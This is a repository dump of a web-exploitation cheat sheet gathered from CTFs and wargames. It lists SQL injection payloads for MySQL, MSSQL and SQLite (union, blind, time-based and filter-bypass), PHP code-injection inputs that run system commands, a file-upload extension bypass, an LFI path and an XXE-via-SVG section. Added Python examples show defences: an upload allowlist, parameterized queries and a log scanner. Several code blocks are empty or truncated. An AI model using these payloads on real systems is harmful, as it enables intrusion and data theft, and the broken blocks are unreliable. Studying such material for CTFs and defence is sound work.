├── README.md
├── codeexec.md
├── lfi.md
├── sqli.md
├── xss.md
└── xxe.md
/README.md:
--------------------------------------------------------------------------------
1 | # web-cheats
2 | This repo is a collection of exploits (cheats) for web vulnerabilities encountered while participating in CTFs, wargames, etc.
3 |
4 | * [SQL Injection](https://github.com/rnehra01/web-cheats/blob/master/sqli.md)
5 | * [Code-Injection](https://github.com/rnehra01/web-cheats/blob/master/codeexec.md)
6 | * [XSS](https://github.com/rnehra01/web-cheats/blob/master/xss.md)
7 | * [LFI](https://github.com/rnehra01/web-cheats/blob/master/lfi.md)
8 | * [XXE](https://github.com/rnehra01/web-cheats/blob/master/xxe.md)
9 |
--------------------------------------------------------------------------------
/codeexec.md:
--------------------------------------------------------------------------------
1 | ###### `#` needs to be encoded when attacks are used through URLs
2 |
3 | #### Beware of the following functions:
4 | ## eval
5 |
6 | ```
7 |
11 | ```
12 |
13 | _[attack]_ = `URL?name=";system("ls");#`
14 |
15 | ## assert() - identical to eval()
16 | ```
17 |
21 | ```
22 | _[attack]_ = `URL?name='.system("ls");#`
23 |
24 | ## preg_replace (with the /e modifier), e.g. preg_replace('/.*/e', ...): /e runs eval() on the replacement string for each match
25 | ```
26 |
29 | ```
30 | _[attack]_ = `URL?pattern=/.*/e&new=system("ls")&base=something`
31 |
32 | ## create_function
33 | ```
34 | '.$order.',$b->'.$order.');'));
36 | ?>
37 | ```
38 | _[attack]_ = `?order=id);}system('ls');#`
39 |
40 | ## include[_once] / require[_once]
41 |
42 | Wildcard: a .php file can be uploaded past preg_match('/\.php$/', $file) by naming it .php2 or .php.blah, so that Apache does not know how to handle the last extension, moves on to the next one, and runs the PHP code.
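As an added example (not code from this repo), the suffix regex above beside an allowlist check, written in Python so it runs stand-alone; `ALLOWED_EXTENSIONS`, the image-only policy and the server-chosen storage name are assumptions for the example.

```python
import re

# Assumed policy for this example: only image uploads are accepted.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

def blocked_by_suffix_regex(filename):
    """The check the page describes: reject only names that end in exactly '.php'.
    It is also case-sensitive, so 'SHELL.PHP' slips through as well."""
    return re.search(r"\.php$", filename) is not None

def upload_name_ok(filename):
    """Allowlist check: a bare file name with exactly one extension from the allowlist.
    Multi-extension names such as shell.php.blah are rejected outright because, as the
    page notes, Apache may fall back to an earlier extension it does recognise."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path component
    parts = name.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False
    return parts[1].lower() in ALLOWED_EXTENSIONS

def safe_stored_name(filename, server_id):
    """Store under a server-chosen name; only the validated extension is kept from the
    client's name, so nothing user-controlled decides how the file is served later."""
    if not upload_name_ok(filename):
        raise ValueError("upload rejected: " + filename)
    return server_id + "." + filename.rsplit(".", 1)[1].lower()

if __name__ == "__main__":
    for probe in ("shell.php", "shell.php2", "shell.php.blah", "SHELL.PHP", "photo.PNG"):
        print(probe, "regex-blocked:", blocked_by_suffix_regex(probe),
              "allowlist-ok:", upload_name_ok(probe))
```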
43 |
--------------------------------------------------------------------------------
/lfi.md:
--------------------------------------------------------------------------------
1 | ### Some special paths
2 |
3 | * `/proc/self/environ`. Another way to reach it is through the symlink `/dev/fd` -> `/proc/self/fd`
4 |
--------------------------------------------------------------------------------
/sqli.md:
--------------------------------------------------------------------------------
1 | ###### In the following queries, `'` may not work sometimes, so { **\`**,`"` } can be tested
2 | ###### To comment out the remaining code, { `;#`,`;--`,`;//` } can be used
3 | ###### While doing SQLi through URLs, { `;#`,`;--`,`;//` } need to be encoded specially
4 |
5 | ### Finding the number of columns in a table _(Error-based SQLi)_
6 | _[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
7 |
8 | * _[$input_user]_ : `' UNION SELECT 1,2,3.. FROM table_name --`
9 | * _[$input_user]_ : `' ORDER BY n --` [If n gives an error, the table has n-1 columns]
10 |
11 | ### Limiting the number of rows
12 | _[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
13 |
14 | * _[$input_user]_ : `' OR 1=1 LIMIT 1 --`
15 |
16 | ## For MySQL
17 | _[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
18 | ###### Assume the number of columns is 3
19 | #### Finding version and databases
20 | * _[$input_user]_ : `' UNION SELECT 1,@@version,database() --`
21 |
22 | #### Extracting Tables from databases
23 | * _[$input_user]_ : `' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()`
24 |
25 | #### Extracting columns from databases
26 | * _[$input_user]_ : `' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()`
27 | * _[$input_user]_ : `' UNION SELECT table_name, column_name, 1 FROM information_schema.columns`
28 |
29 | ### Fetching a particular column without knowing column's name
30 | * `SELECT F.4 FROM (SELECT 1, 2, 3, 4 UNION SELECT * FROM users)F;` will fetch 4th column of `users`.
31 |
32 | It works because the column names of the derived table come from the leftmost `SELECT`, so its columns are named 1, 2, 3 and 4.
33 | ## For MSSQL
34 | _[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
35 | ###### Assume the number of columns is 3
36 | #### Finding version and databases
37 | * _[$input_user]_ : `' UNION SELECT 1,@@version,db_name(i) --` [Here **i** is the i-th database present]
38 | * _[$input_user]_ : `' UNION SELECT 1,@@version,name FROM master..sysdatabases --`
39 |
40 | __[In MSSQL, if the second column is `username`, then the payload `' UNION SELECT 1,1,name FROM master..sysdatabases --` won't work; the second column MUST be a string. Interesting!!]__
41 |
42 | ## For SQLite
43 | In SQLite, __sqlite_master__ replaces __information_schema__.
44 |
45 | _[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
46 | #### Extracting sqlite version
47 | _[$input_user]_ : `' UNION SELECT sqlite_version()`
48 | #### Extracting table names
49 | _[$input_user]_ : `' UNION SELECT name FROM sqlite_master WHERE type='table'`
50 | #### Extracting column names from a table
51 | _[$input_user]_ : `' UNION SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name = 'table_name'`
52 |
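As an added example (not code from this repo), the vulnerable login query used throughout this page, with the `' OR 1=1 LIMIT 1 --` bypass from "Limiting the number of rows" and the SQLite `UNION` probes above run against it, beside the same query with bound parameters. Python's built-in `sqlite3` and the `users` table are constructed for the example.

```python
import sqlite3

# Constructed demo schema; nothing here comes from the original repo.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pass TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'alice', 'hunter2');
"""

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def login_vulnerable(conn, user, pw):
    """The page's vulnerable pattern: input pasted straight into the SQL text."""
    query = ("SELECT username FROM users WHERE username='" + user
             + "' AND pass='" + pw + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_safe(conn, user, pw):
    """Same logic with bound parameters: the SQL text is fixed, input is data only."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND pass=?", (user, pw)
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    for probe in ("' OR 1=1 LIMIT 1 --",
                  "' UNION SELECT sqlite_version() --",
                  "' UNION SELECT name FROM sqlite_master WHERE type='table' --"):
        print(repr(probe), "->", login_vulnerable(db, probe, "x"),
              "| parameterized:", login_safe(db, probe, "x"))
```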
53 | ## Blind SQLI
54 | _[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
55 |
56 | * _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "%a%") --` [Asks whether any user has the letter "a" or "A" somewhere in their name]
57 | * _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "__a%") --` [Asks whether the letter is in the 3rd position or not]
58 |
59 | Here `%` and `_` are wildcards: `%` matches any string and `_` matches exactly one character.
60 |
61 | * By default, LIKE is __case-insensitive__
62 |
63 | _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE BINARY "%a%") --` [To make a case sensitive search, use BINARY right after LIKE]
64 |
65 | ## Time-based Blind SQLI
66 | _[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
67 | #### MySQL
68 | * _[$input_user]_ : `' OR (SELECT SLEEP(10) FROM table_name WHERE username='something') --`
69 | * _[$input_user]_ : `' OR IF(username='something',SLEEP(10),0) --`
70 |
71 | [Produces a delayed response if username=`something` exists]
72 | #### SQLite
73 | * _[$input_user]_ : `' OR CONDITION='true' AND 1=randomblob(100000000) --`
74 |
75 | [Produces a delayed response if CONDITION='true']
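On the detection side, as an added example (not code from this repo): a scanner that URL-decodes each query parameter of an access-log request, which matters because the page notes that `#`, `--` and friends travel encoded in URLs, and matches it against signature families built from the UNION, schema-probe, time-based and comment-tail payloads on this page. The Apache-style log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signature families taken from the payloads listed on this page.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("schema-probe", re.compile(r"\b(information_schema|sqlite_master|sysdatabases)\b", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark|randomblob)\s*\(", re.I)),
    ("tautology", re.compile(r"\bor\b\s+\S+\s*=\s*\S+", re.I)),
    ("comment-tail", re.compile(r"(--|#|/\*)\s*$")),
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def classify_value(value):
    """Signature names that fire on one decoded parameter value."""
    value = value.strip()
    return [name for name, rx in SIGNATURES if rx.search(value)]

def scan_request(target):
    """Decode every query parameter of a request target and collect the hits."""
    hits = set()
    # parse_qsl percent-decodes, so "%27", "%2D%2D", "%23" are matched in clear
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(classify_value(value))
    return sorted(hits)

def scan_log(text):
    """(line_no, hits) for every access-log line with at least one hit."""
    flagged = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        hits = scan_request(m.group(1)) if m else []
        if hits:
            flagged.append((n, hits))
    return flagged

# Constructed sample log (Apache-style, not real traffic); lines 2-3 carry page payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /login?name=alice&pass=hunter2 HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /login?name=%27%20UNION%20SELECT%201%2C%40%40version%2Cdatabase()%20--%20&pass=x HTTP/1.1" 200 981
10.0.0.7 - - [10/Oct/2023:13:55:51 +0000] "GET /login?name=%27%20OR%20IF(username%3D%27admin%27%2CSLEEP(10)%2C0)%20--%20&pass=x HTTP/1.1" 200 12
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /search?q=select+a+restaurant HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for line_no, hits in scan_log(SAMPLE_LOG):
        print(line_no, ", ".join(hits))
```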
76 |
77 | ## Bypassing BLACKLISTED CHARS
78 | * `,` using `JOIN`
79 |
80 | `SELECT 1,2,3 FROM users` becomes `SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c`
81 |
82 | * Bypassing filtered `'`__[quote]__ (special case)
83 |
85 | user = `\` & pass = `OR 1=1 --`
91 |
92 | ## Common errors
93 | * MySQL string comparison is case-insensitive by default and also ignores trailing spaces
94 |
95 | How to exploit that?
96 |
97 | A username `Admin` can be created and then used to sign in as `admin`
98 |
--------------------------------------------------------------------------------
/xss.md:
--------------------------------------------------------------------------------
1 | ### XSS
2 |
3 | * ``
4 | * ``
5 |
--------------------------------------------------------------------------------
/xxe.md:
--------------------------------------------------------------------------------
1 | #### XXE with SVG
2 | ```
3 |
4 |
6 | ]>
7 |
10 | ```
11 | This displays the result in the rendered SVG image.
12 |
--------------------------------------------------------------------------------